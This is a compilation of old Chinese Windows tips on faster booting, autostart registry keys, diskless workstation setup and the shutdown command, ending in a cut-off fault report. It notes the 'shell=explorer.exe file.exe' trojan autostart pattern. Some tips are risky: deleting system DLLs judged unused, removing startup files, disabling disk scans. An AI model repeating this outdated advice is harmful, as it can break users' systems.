让计算机启动更快的十五招

《一键清理系统垃圾》

让计算机启动更快的十五招

    嫌计算机启动太慢是每个计算机迷的共同心病，让计算机启动更快是大家的共同心愿，本人在使用计算机过程中总结了加快计算机启动速度的“十五式”，与您分享。

一、bios的优化设置

在bios设置的首页我们进入“advanced bios features”选项，将光标移到“frist boot device”选项，按“pageup”和“pagedown”进行选择，默认值为“floppy”，这表示启动时系统会先从软驱里读取启动信息，这样做会加长机器的启动时间，减短软驱的寿命。所以我们要选“hdd-0”直接从硬盘启动，这样启动就快上好几秒。 另外，对于bios设置中的“above 1mbmemorytest”建议选“disabled”，对于“quickpoweronselftest”建议选择enabled。

在“advanced chipset features”项中的设置对机子的加速影响非常大，请大家多加留意。将“bank 0/1 dram timing”从“8ns/10ns”改为“fast”或“turbo”。“turbo”比“fast”快，但不太稳定，建议选“fast”。如果记忆体质量好可以选“turbo”试试，不稳定可以改回“fast”。

对于内存品质好的内存条建议在“sdram cas latency”选项中设置为“2”，这样可以加快速度哦。

较新的主板都支持agp4x，如果你的显卡也支持agp4x，那么就在“agp-4xmode”处将这项激活，即选为“enabled”，这才会更好的发挥显卡的能力，加快系统启动速度。

二、启动dma方式，提高硬盘速度

采用udma/33、66、100技术的硬盘最高传输速率是33mb/s、66mb/s、100mb/s，从理论上来说是ide硬盘（这里是指pio mode4 模式，其传输率是16.6mb/s）传输速率的3～6倍，但是在windows里面缺省设置中，dma却是被禁用的，所以我们必须将它打开。

具体方法是：打开“控制面板→系统→设备管理器”窗口，展开“磁盘驱动器”分支，双击udma硬盘的图标，进入“属性→设置→选项”，在“dma”项前面“√”，然后按确定，关闭所有对话框，重启计算机即可。

三、去掉windows的开机标志。

首先你要打开“开始”→“设置”→“活页夹选项”，从“查看”标签里的“高级设置”列表框中勾选“显示所有文件”。然后打开c盘，找到msdos.sys这个文件，并取消它的“只读”属性，打开它，在“option”段落下，加上一行语句：logo=0，这样windows的开机图案就不会被加载运行，开机时间也可以缩短3秒钟。

四、优化“启动”组。

计算机初学者都爱试用各种软件，用不多久又将其删除，但常常会因为某些莫名其妙的原因，这些软件还会驻留在“启动”项目中（尤其是在使用一些d版软件时），windows启动时就会为此白白浪费许多时间。要解决这个问题，其实很简单，你可以打开“开始”→“运行”，在出现的对话框的“打开”栏中选中输入“msconfig”，然后点击“确定”，就会调出“系统配置实用程序”，点击其中的“启动”标签，将不用加载启动组的程序前面的“√”去掉就可以了。如此一来，至少可以将启动时间缩短10秒。

五、整理、优化注册表。

windows在开机启动后，系统要读取注册表里的相关资料并暂存于ram（内存）中，windows开机的大部分时间，都花费了在这上面。因此，整理、优化注册表显得十分必要。有关注册表的优化，可以使用windows优化大师等软件。以windows优化大师，点击“注册信息清理”→“扫描”，软件就会自动替你清扫注册表中的垃圾，在扫描结束后，会弹出个菜单让你选择是否备份注册表，建议选择备份，备份后再点击“清除”即可。

六、经常维护系统。

如果在系统中安装了太多的游戏、太多的应用软件、太多的旧资料，会让你的计算机运行速度越来越慢，而开机时间也越来越长。因此，最好每隔一段时间，对计算机做一次全面的维护。点击“开始”→“程序”→“附件”→“系统工具”→“维护向导”，然后点击“确定”按钮即可对计算机进行一次全面的维护，这样会使你的计算机保持在最佳状态。对于硬盘最好能每隔2个星期就做一次“磁盘碎片整理”，那样会明显加快程序启动速度的，点击“系统工具”→“磁盘碎片整理程序”即可。注意在整理磁盘碎片时系统所在的盘一定要整理，这样才能真正加快windows的启动顺序。

七、扩大虚拟内存容量。

如果你的硬盘够大，那就请你打开”控制面板“中的“系统”，在“性能”选项中打开“虚拟内存”，选择第二项：用户自己设定虚拟内存设置，指向一个较少用的硬盘，并把最大值和最小值都设定为一个固定值，大小为物理内存的2倍左右。这样，虚拟内存在使用硬盘时，就不用迁就其忽大忽小的差别，而将固定的空间作为虚拟内存，加快存取速度。虚拟内存的设置最好在“磁盘碎片整理”之后进行，这样虚拟内存就分不在一个连续的、无碎片文件的空间上，可以更好的发挥作用。

八、去掉“墙纸”、“屏幕保护”等花哨的设置。

这些设置占用系统资源不说，还严重影响windows的启动顺序。去掉它们的方法是：在桌面空白处点击鼠标右键，在弹出的菜单中选择“属性”，在弹出的对话框中分别选择“背景”和“屏幕保护程序”标签，将“墙纸”和“屏幕保护程序”设置为“无”即可。

九、删除autoexec.bat和config.sys。

系统安装盘根目录下的autoexec.bat和config.sys这两个文件，windows已经不需要它们了，可以将它们安全删除，这样可以加快windows的启动速度。

十、精简*.ini文件，尤其是system.ini和win.ini的内容。

在system.ini的[boot]和[386enh]小节中加载了许多驱动程序和字体文件，是清除重点。尤其要注意的是，[boot]字段的shell=explorer.exe是木马喜欢的隐蔽加载之所，木马们通常会将该句变为这样：shell=explorer.exe file.exe，注意这里的file.exe就是木马服务端程序！有了木马随后加载运行不仅对系统安全造成了威胁，计算机启动也慢了许多；对win.ini中的“run”及“load”后面加载的、不是每次开机必须运行的程序，可以暂时清除，等以后要用时再点击运行。这样开机时windows调用的相关文件就会减少许多，启动速度自然就会快多了。

十一、关闭磁盘扫描。

用文本编辑器打开msdos.sys，会看到以下内容：
    [options]
    bootmulti=1
    bootgui=1
    autoscan=1
    如果不想非正常关机后运行磁盘扫描程序，可以把atuoscan=1改为autoscan=0，这样在非正常关机后计算机的启动速度也会快上一些（因为scandisk没有运行嘛）。

十二、让引导信息停留时间最短。

用文本编辑器打开msdos.sys，设置[options]中的bootdelay为0即可。

十三、减少不必要的字体文件。

字体文件占用系统资源多，引导时很慢，并且占用硬盘空间也不少。因此尽量减少不必要的字体文件。但如果删错了字体文件，搞不好会使windows不正常。因此可以采用下面这个“偷梁换柱”的方法（可以实现字体文件的安装，而不占用大量的磁盘空间）：首先打开字库活页夹（如f:\zk），选中全部truetype字体文件，用鼠标的右键将它们拖动到c:\windows\fonts活页夹中，在弹出的菜单中选择“在当前位置创建快捷方式”，这样就可以在系统的字体活页夹下建立字库文件的快捷方式了。当需要使用这些字库文件时，只要插入字库光盘，不用时取出就可以了。

十四、删去多余的dll文件。在window操作系统的system子目录里有许多的dll文件，这些文件可能被许多文件共享，但有的却没有没有一个文件要使用它，也就是说这些文件没用了，为了不占用硬盘空间和提高启动运行速度，完全可以将其删除。

十五、“旁门左道”的办法。如采用系统悬挂，即将当前系统状态在关机后保存，下次开机后，系统会直接进入上次关机前的桌面，用这种方法，开机时间最快可以达到4-5秒钟，但不是所有的主板bios都支持的，设置起来也稍显麻烦。

打开注册表，展开到hkey_local_machine\software\microsoft\windows\currentversion\shareddlls子键，在右边的有许多dll文件，如果资料为0，则可以判定该dll文件没有程序共享，可以删掉它。

如果按以上的方法做了计算机启动速度仍不够快，除了升级硬件（cpu、内存、硬盘等）外，另一个好办法是重装系统，这样可以明显加快计算机启动速度，不信就试试看！


如何启动休眠功能

《一键清理系统垃圾》

如何启动休眠功能

    问：我的电脑安装的是Windows XP和Windows 2000双系统，现在两个系统里的休眠功能都无法使用，在BIOS中已设置过了，请问我该怎么办？

    答：必须以Administrators或Power Users群组成员的身分登录。在Windows XP中进入“控制面板→性能和维护→电源选项”，在Windows 2000中选择进入“控制面板→电源选项”，进入“休眠”项，然后勾选“启用休眠”一项，再按下“确定”关闭电源选项对话框即可。如果休眠选项不可进入，则表示你的硬件设备无法支持休眠特性。


如何设置从光驱启动

《一键清理系统垃圾》

如何设置从光驱启动

    计算机启动还在自检(屏幕为黑屏白字，同时在屏幕右上角还显示一个图标)时按住键盘上的“Del”键，即可进入“CMOS Setup Utility”界面，利用光标移动键选择“Advanced BIOS Features”，敲回车键进入该项设置并选择“First Boot Device”项，利用“Page Up”或“Page Down”两个键将它修改为相应项，即如果你用光盘启动则更改为“CDROM”，而若用软盘启动则应修改为“Floppy”；最后按F10键并敲回车键保存设置后退出BIOS设置。然后放入相应启动盘便可从该盘进行启动了。


如何找到自启动程序

《一键清理系统垃圾》

如何找到自启动程序

    如果系统启动时自动加载的程序过多，会造成启动速度缓慢，而很多病毒或者木马也是在系统启动时自动加载的。所以了解怎样在Windows中查找自启动程序是非常重要的。

    一、在“启动”文件夹中寻找
    “启动”文件夹一般位于“系统盘符\Documents and Settings\用户名\开始菜单\程序\启动\”目录(Win 2000/XP)或“系统盘符\WINDOWS\Start Menu\Programs\启动\”目录。通过快捷方式的属性可以查出程序所在的位置。

    二、从自动批处理文件中寻找
    在Win 98中，Autoexec.bat和Winstart.bat文件中的程序在开机时自动执行；而在Win Me/2000/XP/2003中，这两个批处理文件默认不被执行。

    三、从系统配置文件中寻找
    在有些系统配置文件中也可以找到自启动程序的踪迹，如Config.sys、Win.ini、System.ini、Wininit.ini和Msdos.sys等。

    四、通过“系统配置实用程序”寻找
    在“开始→运行”中键入“msconfig.exe”启动“系统配置实用程序”，进入“启动”选项卡，即可查看随系统启动的程序名称和位置。
    注意：Win 2000本身没有Msconfig程序，可以从Win XP/2003中提取。

    五、从计划任务中寻找
    在“控制面板”中双击“任务计划”就可以查看是否有计划任务随系统一起启动。

    六、使用“系统信息”寻找
    进入“系统信息”主界面，依次展开分支“软件环境→启动程序”，就可以在右窗格中查看自启动程序名称和位置。

    七、使用“组策略”寻找
    在Win 2000/XP/2003中，在“开始→运行”中键入“gpedit.msc”，打开“组策略”，依次展开“用户配置→管理模板→系统→登录/注销”，双击“在用户登录时运行这些程序”，单击“显示”按钮，即可查看自启动程序。

    八、通过注册表寻找
    在注册表中，可以从下列键值中查找自启动程序的名称和位置。
    1.Userinit键
    位于“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit”。这个键允许指定用逗号分隔的多个程序。
    2.Explorer\Run键
    位于“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run”。
    3.RunServicesOnce键
    RunServicesOnce键用来启动服务程序，在用户登录之前启动，具体位置是“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce”。
    4.RunServices键
    RunServices键指定的程序在RunServicesOnce指定的程序之后运行，不过仍在用户登录之前。具体位置是：“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunServices”。
    5.Run键
    Run是自动运行程序最常用的键，位置在“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”。
    6.Load键
    位于“HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load”。
    另外还有RunOnce、RunOnce\Setup等键。

    九、使用工具软件
    除了使用系统提供的工具以外，我们还可以求助于第三方软件，比如Windows优化大师、RegRun Gold等等。


如何自动重启

《一键清理系统垃圾》

如何自动重启

    当Win 2000出现系统崩溃时，和Win 9X一样也会出现蓝屏，通常我们需要按下Reset键进行重启，不过，通过修改注册表我们可以设置自动重启。
    打开注册表编辑器，然后进入主键［HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl］，将其中的键值：“AutoReboot”设置为“1” 。
    这样当下次系统崩溃後，就会自动重启。


删除启动选项中的选项

《一键清理系统垃圾》

删除启动选项中的选项

    问：在“开始菜单”中的“运行”项中输入“msconfig”之后选择“启动”选项卡，可以看到很多开机时自启动的软件名，可有些我永远也不想开机启动，又不想它出现在此选项卡中，请问能否将它们彻底删除？

    答：打开注册表编辑器，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
以及“开始菜单→程序→启动”中查找你不需要的项并删除。另外也可以使用一些软件清理，例如超级兔子魔法设置等。


设置NT网中无盘站的远程启动

《一键清理系统垃圾》

设置NT网中无盘站的远程启动

    远程启动服务是Windows NT Server的一项功能，它支持使用服务器硬盘而不是工作站硬盘上的软件启动MS－DOS和Windows工作站。使用远程启动服务可以增加网络安全性，并提供给网络系统管理员更大的控制权,具有容易集中升级软件，降低购买和维护工作站的成本等优点。目前，在NT网络资料中涉及远程启动工作站的内容不多，尤其是涉及模板配置文件中不存在的网卡，如何解决它的配置问题更是少见。下面作者以中文NT Server 4.0为例,介绍NT网络(无盘)工作站远程启动的安装过程,供大家参考。

    一、安装远程启动服务及开始远程启动服务

    要想远程启动工作站，首先要安装远程启动服务。过程如下：

    1、先在服务器上加入DLC通讯协议和NetBEUI通讯协议，因为远程启动服务请求DLC通讯协议和NetBEUI通讯协议；然后再加入远程启动服务。

    (1)在“控制面板”中，打开“网络”窗口；

    (2)在“网络”窗口中，选择“协议”，单击“添加”按钮，从中选择“DLC通讯协议”和“NetBEUI通讯协议”；选择“服务”，单击“添加”按钮，从中选择“远程
启动服务”，并单击“确定”按钮。这样系统将创建一个rpl目录,并将其中的rpl\rplfiles目录设置成共享。

    2、在控制面板中，双击“服务”图标打开“服务”窗口；在“服务”窗口中选择“远程启动服务”，并单击“开始”按钮，这样就开始了远程启动服务。

    二、远程启动(无盘)工作站

    远程启动工作站,首先需将工作站指定的操作系统拷贝到NT服务器上,然后运行“远程启动管理器”,加入远程工作站,为其建立轮廓文件和远程启动数据库记录。过程如下：

    1、在服务器上安装指定操作系统。

    (1)生成指定操作系统；例如MS－DOS622,可通过setup/q得到完整的命令文件,然后再将两个DOS系统文件io.sys,msdos.sys和命令解释command.com文件拷到该目录。当然io.sys和msdos.sys两个文件先要改变属性,去掉其系统与隐藏属性。

    (2)将生成的指定操作系统文件(例如版本号是622)拷贝到服务器上rpl\rplfiles\binfiles\dos622目录中。

    2、加入远程(无盘)工作站。

    运行“远程启动管理器”，首先取得(无盘)工作站的网卡ID号,然后为其建立轮廓文件和远程启动数据库记录。过程如下:

    (1)取得远程工作站的网卡ID号。

    A)打开远程工作站。工作站实际上不启动，但向服务器发送启动请求。

    B)在“远程启动管理器”的“查看”菜单上，单击“刷新”。这时远程工作站的网卡记录就会出现,这个网卡记录包括了被启动的远程工作站的网卡ID号。若是此网卡
不是模扳文件中指定的网卡,则会在网卡号之后出现无确定标识提示,这时需要手动设置。以Accton EN166x网卡为例,此卡与NE2000卡兼容,可按NE2000卡来配置。过程如下:

    ●将NT SERVER光盘上clients\rpl\update目录拷贝到硬盘上,修改目录中的Ne200cpt.rpl文件,将其中NE2000－compatible的ID号004033改为Accton EN166x网卡的ID号 0000E8;

    ●在DOS窗口中,键入RPLCMD 网卡数据库。这时再回到“远程启动管理器”中,就可看到网卡标识已更改为NE2000 Compatible。

    (2)建立(无盘)工作站的轮廓文件。

    在“远程启动管理器”中,打开“配置”菜单，单击“检查配置”，这样可以检查远程启动工作站的可用操作系统；单击“修复安全性”，则将覆盖\system root\RPL 目录中的权限，为远程启动工作站创建账号及创建RPLUSER 本地账号，并更新远程启动工作站中Lanman.ini文件中的域项以便与服务器自身的域/工作组匹配。然后在“远程启动”菜单中，单击“新建配置文件”，其对话框,在“配置文件名”框中，键入配置文件名；在“配置”框中，选择与你网卡及指定操作系统相一致的某种配置。比如：3Com EtherLink III网卡就选择DOS6.22 3Com EtherLink III;ACCTON EN166x网卡就选择DOS6.22 Novell NE2000。

    (3)为工作站建立远程启动数据库记录。

    在“远程启动管理器”中,选择一个网卡记录,并在“远程启动”菜单上，单击“转换适配器”。

    A)在“工作站名”框中，键入工作站名。这样远程启动服务用这个名字建立一个NT用户帐号。

    B)在“说明”框中，键入工作站说明。框中已有网络适配器自身提供的说明。

    C)选定两类配置之一：若此工作站与其它工作共享配置文件，则选择“共享”；若此工作站必须使用配置文件的个人副本以便自定义工作站环境，则选择“个人”。

    D)在“配置文件中的工作站”框中，为该工作站选择配置文件。

    E)单击“添加”按钮。

    这时打开远程工作站,远程工作站就可通过NT服务器启动到MS－DOS状态。远程工作站上操作系统命令文件所在目录是:C:\DOS,它与服务器上的目录RPL\RPLFILES\BITF
ILE\DOS622是对应的。

    三、在无盘工作站上安装MS－PWIN 3.2

    当工作站可以被启动到MS－DOS状态时,就可以给它安装PWIN 3.2。过程如下:

    1、安装PWIN 3.2文件到服务器上。

    1)在某台工作站上以超级管理者的名字和口令登录NT服务器。

    2)共享服务器上的CD—ROM。首先,在服务器上设置CD —ROM共享;然后在工作站上使用命令NET USE G:\\NESERVER\CD—ROM来共享CD—ROM。

    3)在工作站上键入G:\PWIN32\SETUP/A将文件安装到C:\WIN中,这样PWIN32系统文件就被放入服务器目录\RPL\RPLFILES\BITFILE\WIN中。

    2、在指定的无盘工作站上安装PWIN32。

    1)打开指定的无盘工作站，键入CD WIN进入WIN目录 。

    2)键入SETUP/N安装PWIN32到目录C:\WINDOWS中;对应服务器上的目录是\RPL\RPLFILES\MACHINE\NAME\PROFILES\WKSTA\WIN,其中NAME是被选定的工作站的名字,而PROFILES为工作站的环境轮廓文件名。这样就可为远程无盘工作站安装PWIN32。

    四、在无盘工作站上安装MS—Windows 95

    首先,在“远程启动管理器”中,对远程无盘工作站建立正确的WIN95环境轮廓文件和建立其远程启动数据库记录;这时打开远程无盘工作站,工作站就可被启动到WIN95的
DOS环境。接下来将WIN95网络版装在NT服务器上，其中最简单的一种方法是把WIN95整个目录直接拷到NT服务器上，并把这个win95目录共享出来。然后,重新启动工作站进
入WIN95的DOS环境,键入net use f:\\ntserver\win95连接上NT服务器上的WIN95共享目录,这样在工作站上就可进行WIN95的安装。需要注意的是，在选择检查硬件时，要自己手工选择，而且越少硬件越好，这样可以避免一些问题。比如一些网卡自动检查会死机，只能手工设置。

返回


设置Windows 95无盘工作站的远程启动

《一键清理系统垃圾》

设置Windows 95无盘工作站的远程启动

    在Windows 95的资源管理器中，切换到光盘的Admin\nettools\Netsetup目录(注意早期的Windows 95光盘都有这个目录)。
    10.4在这台Windows 95工作站上，执行Admin\Nettools\Netsetup目录下的Netsetup.exe程序。
    10.5出现“基于服务器的安装”对话框时，选择“设置路径”按钮。
    10.6出现“服务器路径"对话框时，请输入SBS服务器上要保存Windows 95文件的路径（也就是步骤10.1的共享目录或其中的子目录），例如\\ZJQ\W95S（ZJQ是我的NT服务器名字），然后单击“确定"按钮。完成后，原“基于服务器的安装"对话框的“设置路径"按钮会被改为“更换路径"按钮。
    10.7单击“安装"按钮。
    10.8出现“源路径"对话框时，请在“安装策略"处单击“服务器"按钮，同时指定Windows 95文件的源路径，也就是工作站光盘中Windows 95安装文件的路径。例如：D:\Pwin95\Win95
    10.9出现“创建默认值"对话框时，请选择“不创建默认值"。
    10.10输入Windows 95 CD的产品标识码，之后开始将Windows 95的文件复制到SBS服务器的共享目录中。安装完成后，单击“退出"。
    10.11在Windows NT服务器上，将Windows NT Server 4.0的光盘放入光驱中，切换到F:\Clients\RPL\update\win95目录，执行Win95srv.bat批处理文件。更新Windows 95文件，以使提供远程启动功能，例如：在Windows NT的命令模式下，输入F:\Clients\RPL\update\win95\win95srv.bat d:\W95s，其中d:\W95s为步骤10.1中建立的保存Windows 95文件的共享目录。
    10.12执行步骤4.1、4.2，使新配置生效。
    11.安装第一台Windows 95无盘工作站
    安装第一台Windows 95工作站首先需要利用一台通过远程启动成为MS－DOS 6.22的工作站，在此工作站执行Windows 95的Setup操作，从Machine Directory（机器目录）复制一些文件到远程启动服务器等。所谓的Machine Directory，其中保存某Windows 95工作站专有的设置数据，例如：Win.ini、System.ini、System.dat、User.dat、临时目录、桌面设置的文件等。我将Machine目录放在SBS服务器上，即Windows NT服务器上。
    11.1在Windows NT服务器上建立Machine目录，例如：建立D:\machines，将此目录设为共享，共享名为machines。
    11.2到一台远程启动工作站上，利用远程启动的方式启动成MS－DOS6.22。
    11.3请将工作站、SBS服务器与Remoteboot服务器的时间同步，否则Windows 95 Setup的操作可能会有问题。
    11.4在此DOS无盘工作站上，利用NET use命令连接SBS目录与Machine Directory,例如：net use F:\\ZJQ\W95S net use G:\\ZJQ\machines，其中ZJQ是我的Windows NT服务器的名字
    11.5切换到SBS目录所在的磁盘，例如F:\。
    11.6执行Windows 95的Setup程序：
    Setup /t:temppath
    其中/t参数用来设置安装时所需的临时文件目录，例如你可以利用下列命令将其设到Machine Driectory中：
    Setup /t:G:\Client1.tmp
    注意在未安装完成之前，不要将这临时文件删除。如果你同时在安装多台Windows 95工作站，请分别建立不同的临时目录。安装时请注意以下事项：
    ● 出现“Server－Based Setup"对话框时，请选择“Set up Windows to run from a network server"。
    ● 出现“Startup Method"对话框时，请选择“Start Windows from the network(remote boot server)"。
    ● 出现“Macdine Directory"对话框时，请输入Machine的路径，例如步骤11.4中的G:\client1.
    ● 出现“Setup Options"对话框时，请选择“Custom"。
    ● 出现“Analyzing Your Computer"对话框时，请选择“No,I want to modify the hardware list"。然后，请从“hardware types"中删除所有选项。这样，安装时不会检测任何硬件。
    ● 出现“Select Components"对话框时，清除“通信"选项（除非工作站上有调制解调器，且使用拨号网络）。
    ●当出现“Network Configuration"对话框时，请选用NE2000 Compatible网卡及适当的通信协议，同时必须确定网卡的设置是否正确等。例如：Add→Adapter→Add→Novell\Anthem→NE2000 Compatible→确定。在“The following network Componets will be installed:"中，选中NE2000 Compatible→properties→Resources→选：Interrupt(IRQ)为5，“I/O address range:"为300－31F→确定。
    ●出现“Identification"对话框时，请确认“Workgroup"处的设置与SBS服务器在相同的Domain，例如在“Workgroup"处输入Domain2。（Domain2是我的Windows NT服务器所在的域名）。
    安装完成后，重启动工作站，但此时仍无法进入Windows 95的工作环境，你还有一些步骤必须完成。

返回


设置自动关机/重启时间

《一键清理系统垃圾》

设置自动关机/重启时间

    2002-01-30　　　　作者：

这个方法是利用cmd.exe实现的。

cmd.exe就想以前的command.com一样，运行以后是一个DOS窗口。但是cmd.exe的功能及其强大，远远超过了command.com，而且cmd.exe还能够实现99%的在图形界面下的功能。所以一旦取得cmd.exe的控制权就能够掌握整个系统。

在Windows XP中的cmd.exe多了一个很有用的东西：shutdown 使用这个东西就能够实现自动关机/重启等操作。使用方法如下：

运行cmd.exe, 输入shutdown,回车就可以看到使用帮助（全中文的），这里列出来做分别解释：

用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]

没有参数 显示此消息(与 ? 相同)
-i 显示 GUI 界面，必须是第一个选项 ---------->>> 显示图形界面，在这里可以设置远程关机、关机提示等信息
-l 注销(不能与选项 -m 一起使用) ---------->>> 没有什么好说的，就是能够换一个用户名登陆
-s 关闭此计算机 ---------->>> 没有什么好说的，不过使用这个以后，最后会出现一个可以安全关机的提示，这时候还要按一下电源开关。
-r 关闭并重启动此计算机 ---------->>> 就是重新启动了。
-a 放弃系统关机 ---------->>> 如果还来得及的话，使用这个参数可以放弃正在进行的关机操作。一般有30秒钟延时。
-m \\computername 远程计算机关机/重启动/放弃 ---------->>> 网络中经常使用的。
-t xx 设置关闭的超时为 xx 秒 ---------->>> 我最喜欢使用的一个参数。利用它就可以指定关机时间了。单位：秒
-c "comment" 关闭注释(最大 127 个字符) ---------->>> 用于给别人的提示
-f 强制运行的应用程序关闭而没有警告 ---------->>> 没有什么好说的，不过要注意，强制关闭应用程序是不会保存的。
-d [u][p]:xx:yy 关闭原因代码 ---------->>> 这里请看微软技术支持。我手头上没有具体代码。
u 是用户代码
p 是一个计划的关闭代码
xx 是一个主要原因代码(小于 256 的正整数)
yy 是一个次要原因代码(小于 65536 的正整数)


双系统默认启动项更改

《一键清理系统垃圾》

双系统默认启动项更改

    问：我的电脑安装的是Win98和WinXP Professional双系统，先安装的是Win98然后安了WinXP，开机时系统光标指在WinXP上，而且时间很短，我想让系统光标在开机时指在Win98上，请问应该怎样做才能实现？

    答：下面两种方法可以帮你达到目的：

    1.启动电脑进入WinXP，选择“开始→控制面板→性能和维护→系统”，在打开的“系统属性”中选择“高级”标签，接着在“启动和故障恢复”项中单击“设置”，然后在弹出的“启动和故障恢复”窗口中选中“显示操作系统列表的时间”的选项，根据自己的情况制定启动菜单的显示时间(一般选择10秒左右就可以了)。最后在“默认操作系统”下面的下拉菜单中选择Win98系统，保存设置后退出，重新启动系统即可。

    2.在系统(Win98和WinXP均可)中安装一个超级兔子软件，然后启动超级兔子魔法设置，点击“电脑启动→开机选择”，在Win98选项前打“√”，在下面的“Win2000/XP自动出现启动菜单和等待时间”前的选择框中打“√”并在其后面的输入框中输入你自己理想的显示时间(以秒为单位)保存设置后退出，重新启动系统就可以了。


无盘工作站多重启动映像文件的制作

《一键清理系统垃圾》

无盘工作站多重启动映像文件的制作

    在NovellNetWare操作系统中，无盘工作站的启动是通过在工作站的网卡上安装一片BootROM实现的。在启动时，工作站发出请求信号给服务器，服务器则传回一个远端启动映像文件，作为启动时用。在启动过程中无需硬盘或软盘，可以有效地预防病毒，同时也可以防止服务器的文件资料外泄，因而具有很高的安全性。无盘工作站的启动速度要比用磁盘启动的速度快，并且可以节省大量的经费。因无盘站具有上述优点，目前正被广泛地应用在各个领域。
    但一般的用户在使用时，都使用了同一个启动映像文件，即NET＄DOS．SYS。这就要求所有的工作站的工作环境一样。在实际工作中，各工作站的硬件配置很有可能不一样，各用户对CONFIG.SYS及AUTOEXEC.BAT要求也不一样，这就需要生成多重启动映像文件。
    假定有这样二个无盘工作站COMPUTER1及COMPUTER2。COMPUTER1工作站使用NE2000的NIC及DOS5.0。COMPUTER2工作站使用NE3200的NIC及DOS6．22。下面是生成各自启动映像文件的过程：（启动映像文件名由用户自己设置，但扩展名一定要用．SYS）。
     一、生成COMPUTER1工作站启动映像文件COMP1．SYS
    和生成NET＄DOS．SYS的过程一样，首先要准备COMPUTER1工作站的启动软盘。步骤如下：
    1．用此工作站上准备使用的DOS（DOS5．0）格式化软盘，并使之含有系统启动文件。
    2．将下列文件复制到软盘：
    IPX．COM、NETX．COM、AUTOEXEC．BAT、CONFIG．SYS。
    如使用ODI方式时，应包含下列文件：LSL．COM、IPXODI．COM、NE2000．COM、VLM．EXE（或NETX.cOM）、AUTOEXEC．BAT、CONFIG．SYS。
    其中的AUTOEXEC．BAT及CONFIG．SYS文件，应按实际需要进行编写。
    由启动软盘生成启动映像文件COMP1．SYS的步骤如下：
    1．从软盘或硬盘启动工作站，并以SUPERVISOR登录入网。
    2．将准备好的COMPUTER1工作站的启动软盘插入A驱动器。
    3．将F：映射到SYS：SYSTEM目录，执行MAPF：ΚSYS：SYSTEM。
    4．将G：映射到SYS：LOGIN目录，执行MAPG：ΚSYS：LOGIN。
    5．进入G：并执行DOSGEN，将准备好的启动软盘中的内容拷贝到COMP1．SYS。执行G：ιLOGIN〉F：DOSGENA：COMP1．SYS。
    6．将COMP1．SYS文件设置成共享，执行“FLAGCOMP1．SYSS”即可。
    7．修改启动映像文件
    早期的BootROM版本不能执行DOS5．0以上的版本，需利用RPLFIX．COM程序进行修改。此文件由NetwareV3．12的磁盘MSDOS－1提供。执行“RPLFIXCOMP1．SYS”命令就可修改启动映像文件。
     二、生成COMPUTER2工作站启动映像文件COMP2．SYS
    生成COMP2．SYS的过程和生成COMP1．SYS的过程类似，所不同的是启动软盘中的文件内容有所差异，应按COMPUTER2工作站的硬件配置、网卡型号、网卡的IRQ值及I／OPort的值、用户使用的DOS版本、对CONFIG．SYS及AUTOEXEC．BAT的要求等重新制作。
    三、BOOTCONF．SYS的建立
    完成以上所述的工作站所需的各自启动映像文件后，文件服务器还无法知道哪台工作站需要哪个启动映像文件。这就需要建立BOOTCONF．SYS文件，此文件可以将网络地址、工作站地址与启动映像文件联系起来。此文件可以由EDIT、PE2或WPS等建立，存放在SYS：LOGIN下，内容如下：
    0X0080，5C890089ΚCOMP1．SYS
    0X0080，5C89DCAAΚCOMP2．SYS
    0080：代表网络地址（NetworkAddress），前面所加的“0X”代表十六进制。5C89DCAA代表工作站地址（NodeAddress）。COMP1．SYS、COMP2．SYS等表示工作站所采用的启动映像文件。
    以上所写的网络地址及工作站地址可以由USERLIST／A命令查得。
    同理对其它工作站也可按顺序一一加入。相同的工作环境的工作站可用同一启动映像文件。如未将工作站与其它启动映像文件对应起来，则此工作站使用NET＄DOS．SYS作为启动映像文件。
    建立好多重启动映像文件后，无盘工作站在启动时先到BOOTCONF．SYS中找是否该文件内含该工作站地址，若找到时，即送出与此工作站相对应的启动映像文件。如未找到则执行缺省的启动映像文件NET＄DOS．SYS。这样就可以使得每台无盘工作站可以按自己的硬件配置和对DOS版本、CONFIG．SYS及AUTOEXEC．BAT的需求进行启动工作了。

返回


无软驱电脑启动故障一例

《一键清理系统垃圾》

无软驱电脑启动故障一例

《中国电脑教育报》齐坚

    朋友的网吧有台电脑开机系统自检完毕后，系统提示无法引导。莫非是硬盘引导区错误？可是网吧的单机都没有光、软驱，无法进入DOS，只有进入DOS才能解决问题呀！便把服务器上的光驱拆下，然后进故障机的BIOS，准备把第一启动项改为CD-ROM。可是一进BIOS，我乐了：原来在BIOS中，第一启动项设为软驱。可是电脑没有安装软驱，就一个劲地傻找，结果可想而知。有些电脑没有软驱就自动进入第二启动项的设置，这台电脑就偏不！改了启动顺序后，蓝天白云飘然而至……


一、系统启动出现的问题

《一键清理系统垃圾》

一、系统启动出现的问题

          一、系统启动出现的问题

          [系统环境:]　window2000＋sp4，
          [基本配置:]　IBM品牌机，CPU2.53G,内存1G
          [故障描述:]
      显示器点不亮，开机后进入主板画面反复重启，怀疑电源问题，更换电源无效，进入BIOS设置，发现CPU频率降到1.9G，仔细检查发现，CPU外频被人从133MHZ改为100MHZ，
